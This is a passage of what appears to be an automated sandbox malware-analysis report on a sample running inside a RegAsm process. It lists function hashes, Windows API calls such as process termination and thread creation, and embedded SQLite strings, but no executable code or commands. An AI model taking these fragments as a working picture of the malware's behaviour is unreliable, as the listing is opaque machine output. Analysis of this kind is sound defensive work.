                                                                                                                                                                                                • Instruction Fuzzy Hash: 23117972300211DBDB24DF2CD9C1A5AB3AAEB05714B100A2AF552EB2C1D778E944879A
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1B4B33D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
                                                                                                                                                                                                • API String ID: 0-1935849370
                                                                                                                                                                                                • Opcode ID: 94dfe5136be57c63567d8dcb77186c45d922ba67cca292fdb42e550f24926504
                                                                                                                                                                                                • Instruction ID: f5547fcabe5cb94037d86a02d978ac7105c50c534a52f26f98750517e008a4d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94dfe5136be57c63567d8dcb77186c45d922ba67cca292fdb42e550f24926504
                                                                                                                                                                                                • Instruction Fuzzy Hash: A60196397442165ADB05DF29E8417CAB7D5EFC5311F05C17AF6048B240EB70A84787A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,164B22F7,?,?,00000000,1B69D1CB,000000FF,?,1B645B30,?,?,1B645ADF,?), ref: 1B645BF6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1B645C08
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,1B69D1CB,000000FF,?,1B645B30,?,?,1B645ADF,?), ref: 1B645C2A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                • Opcode ID: 3516af63af31fe14dd3d29db229c82bff14004516d00286ed8e0c05aa4156a36
                                                                                                                                                                                                • Instruction ID: 7cdeca58a17064a0c6d8980f6aab861a2e7f642906d100756a0d06190aa459a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3516af63af31fe14dd3d29db229c82bff14004516d00286ed8e0c05aa4156a36
                                                                                                                                                                                                • Instruction Fuzzy Hash: 640162B2914529AFDB058F90CD44BFEB7BCFB68715F004A29F851A2680DB79D904CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 93ba2142ea2a926e5d9b02b27c8632a6d012321557e18e6b920348f14f4e6f85
                                                                                                                                                                                                • Instruction ID: 8ca5dfeba2299fe6a26a2e240e847641616a40df3282bf96674dae22bbd0fcd2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93ba2142ea2a926e5d9b02b27c8632a6d012321557e18e6b920348f14f4e6f85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16028BB09043568FE704CF65DA84B9BBBE9BF94314F04492DFD8987240E774E948CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410046
                                                                                                                                                                                                • memset.MSVCRT ref: 00410068
                                                                                                                                                                                                  • Part of subcall function 0040FC97: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00410095,00000000), ref: 0040FCA2
                                                                                                                                                                                                  • Part of subcall function 0040FC97: HeapAlloc.KERNEL32(00000000,?,00410095,00000000), ref: 0040FCA9
                                                                                                                                                                                                  • Part of subcall function 0040FC97: wsprintfW.USER32 ref: 0040FCBA
                                                                                                                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 004100EF
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004100FD
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410104
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1628159694-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEB0
                                                                                                                                                                                                • lstrcpyn.KERNEL32(0063F728,?,00000000,00000104,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEC9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000104,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEDB
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040FEED
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                • String ID: %s%s
                                                                                                                                                                                                • API String ID: 1206339513-3252725368
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041918D
                                                                                                                                                                                                  • Part of subcall function 00419364: __getptd_noexit.LIBCMT ref: 00419367
                                                                                                                                                                                                  • Part of subcall function 00419364: __amsg_exit.LIBCMT ref: 00419374
                                                                                                                                                                                                • __getptd.LIBCMT ref: 004191A4
                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004191B2
                                                                                                                                                                                                • __lock.LIBCMT ref: 004191C2
                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 004191D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004078E4
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407E33
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407E47
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                • API String ID: 3207582090-1885708031
                                                                                                                                                                                                • Opcode ID: 95ab6ae9d41267cd4cbe941da05c12f5f9fec3af852a616dafe1bc6877076ef3
                                                                                                                                                                                                • Instruction ID: d6daef34dd889aade97a6d088ac326fffd9d4fa63bfd2f3c0a532a041e6e8760
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95ab6ae9d41267cd4cbe941da05c12f5f9fec3af852a616dafe1bc6877076ef3
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD125E71804148EADB05EBE6C956FEEBB78AF15308F1044BEE442731C2DB781B58DB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • fts5: syntax error near "%.*s", xrefs: 1B5B751C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts5: syntax error near "%.*s"
                                                                                                                                                                                                • API String ID: 0-498961494
                                                                                                                                                                                                • Opcode ID: 104b3a3073fad71d278320154e199e3180d02c375d8795ad79224adb6594ca3f
                                                                                                                                                                                                • Instruction ID: a5b28d1759a4617f53b45815f8538d691fafa095175a8218aaefd7a8c806cae9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 104b3a3073fad71d278320154e199e3180d02c375d8795ad79224adb6594ca3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DDB1AE708043419FE714CF24C984B9BBBE9BF94308F18495DF8D997240E775E98ACBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: integer overflow
                                                                                                                                                                                                • API String ID: 0-1678498654
                                                                                                                                                                                                • Opcode ID: cb227db4fcfefdc9eb0f5bce7329ee6f4d61a2e21a162d4df8e27e99ed85d94c
                                                                                                                                                                                                • Instruction ID: b066d0a1d22195a97db6aac6ef6cca5b169486834b94e4fd1df0976b0b7a32d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb227db4fcfefdc9eb0f5bce7329ee6f4d61a2e21a162d4df8e27e99ed85d94c
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB11D375C047216ADF01BF34BC01BCA7BA95F6A324F05835DE4969A2E2E76091D9C3D3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: [%d]
                                                                                                                                                                                                • API String ID: 0-394612830
                                                                                                                                                                                                • Opcode ID: c9c2ab3a1b9d10b60aaa7b8c3a8d83901afa7334c6514d1f4b9513d05debeca8
                                                                                                                                                                                                • Instruction ID: a4a2688be776aacc3f4034080c0ba71da1231124f2c1b4142a91ce67572a1807
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9c2ab3a1b9d10b60aaa7b8c3a8d83901afa7334c6514d1f4b9513d05debeca8
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB71E3B5908341AEFB20CB20DE81FE777E9AB85704F44891DE68582681F735F549CB72
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B596391
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B596396
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B596387
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 2828baff745f48db3ec292c075e835b153039b9630abc7c9cafd21bf68bcceec
                                                                                                                                                                                                • Instruction ID: bc6a22cb9c6bec40b1c7343e0c012322df67a22a93ef240302d865b301124d3b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2828baff745f48db3ec292c075e835b153039b9630abc7c9cafd21bf68bcceec
                                                                                                                                                                                                • Instruction Fuzzy Hash: B371D576A082518BEF04DF14E8C17EA7BE1EF44324F950999FC85CB292E735E889C761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                • API String ID: 0-3826999013
                                                                                                                                                                                                • Opcode ID: fb21d9b83ed107f5166a5a41e177276402d34ee1ca17ead0efcdf483f45bbc53
                                                                                                                                                                                                • Instruction ID: 8da185322f4fb6562e85f72c18cf52d5e3ce6badc4343b445695ad83288d473d
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb21d9b83ed107f5166a5a41e177276402d34ee1ca17ead0efcdf483f45bbc53
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2961ABB16007419FDB24CF34CC81AA7B7E9AFA8744F01896DF98797251EB34E909CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1B640FE7
                                                                                                                                                                                                • CatchIt.LIBVCRUNTIME ref: 1B6410CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CatchEncodePointer
                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                • API String ID: 1435073870-2084237596
                                                                                                                                                                                                • Opcode ID: 79b1bb187d3271987d47799367df50a4880768553b224889993c2d336ed04611
                                                                                                                                                                                                • Instruction ID: 0e6d50f213cd16d45b1fd53c8722e6f948691e91b8ac9c3f670cdb4ed35b72d3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b1bb187d3271987d47799367df50a4880768553b224889993c2d336ed04611
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F4179B5A00649EFCF15CF95CD82AEE7FB5FF58300F248059E91467210D735AA50DB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: temp$wrong number of vtable arguments
                                                                                                                                                                                                • API String ID: 0-2849069181
                                                                                                                                                                                                • Opcode ID: ea97c32162853ce65ad632d69162a33b59c76c65121e586272c88bbec71c6dc9
                                                                                                                                                                                                • Instruction ID: 9c7ab2336b3d5f2ed02949674fce3f5870e638fc957363eea19668f3844b1567
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea97c32162853ce65ad632d69162a33b59c76c65121e586272c88bbec71c6dc9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C51AFB9A043458FDB15CF24D4905DABBF1BF89304F444A6DE4865B321D332E94ACB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4D35F4
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D35F9
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D35EA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 8c7df07536abd1870e1c365c22b35c16b61c63fc8795b175223560d99dd2e24f
                                                                                                                                                                                                • Instruction ID: a923a06f595b3deeb8a56d3f4b8c13f0321ca1f8cc068aea8c949c0712e927f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c7df07536abd1870e1c365c22b35c16b61c63fc8795b175223560d99dd2e24f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5051E1F5E00711AFDB148F18C8D4A96BBB4BF64724F09C25CE8995B342D331E850CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B5497EA
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5497EF
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5497E0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 24554fc780079735f151fbe592e322dc13a9cdd5f6bb96b0bf8866ed0d5f6158
                                                                                                                                                                                                • Instruction ID: 7651bb36ed55757b85742083248b67717184af183d9e3c4f24c32e0069592332
                                                                                                                                                                                                • Opcode Fuzzy Hash: 24554fc780079735f151fbe592e322dc13a9cdd5f6bb96b0bf8866ed0d5f6158
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE4159766047908FE7218F7C94416D7FFF0DF82221F6849AED2C58B652F262E482D361
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
                                                                                                                                                                                                • API String ID: 0-1808655853
                                                                                                                                                                                                • Opcode ID: 3ab857dddf7e1c84410c436fee5acd841a7e7e52eea2f31a0dae476875dcbcc5
                                                                                                                                                                                                • Instruction ID: 16cbe8b3a561be6ca43fda044150beb38451cc43bb76de717272b865ccab8128
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ab857dddf7e1c84410c436fee5acd841a7e7e52eea2f31a0dae476875dcbcc5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E1412871A003119BD704AE38DC809AFB798BBE8210F554A2EF992C6350D331D549CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B615980
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B615985
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B615976
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 2023d91c2405a7825b7e3ea73f1d9584d81e560518bb5dfa49c5ded48be5dc43
                                                                                                                                                                                                • Instruction ID: 110e8926c3833da639e956e99dbb5efcfd3e0e9afcae1e7d28e3655002c23d83
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2023d91c2405a7825b7e3ea73f1d9584d81e560518bb5dfa49c5ded48be5dc43
                                                                                                                                                                                                • Instruction Fuzzy Hash: D54129B6D413519FD7108B54DC81BDAF7F4AFE5320F88056AFC845B241E329E994C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B62895F
                                                                                                                                                                                                • os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 1B6288E2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
                                                                                                                                                                                                • API String ID: 0-1037342196
                                                                                                                                                                                                • Opcode ID: 1d4bb1264e13cf800ce7ec4bb1a1c9d0ed3e8c9bb56719ff954f62fe24282b0c
                                                                                                                                                                                                • Instruction ID: dce0b093af0f0b01450db634de51ce5db887c25bb7d12be59efc73f85055072b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d4bb1264e13cf800ce7ec4bb1a1c9d0ed3e8c9bb56719ff954f62fe24282b0c
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB213BB4604256AFEB209724CC86BFBBBD9AFE4304F944C5DE5C8C6192C23498448753
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4D5408
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D540D
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D53FE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
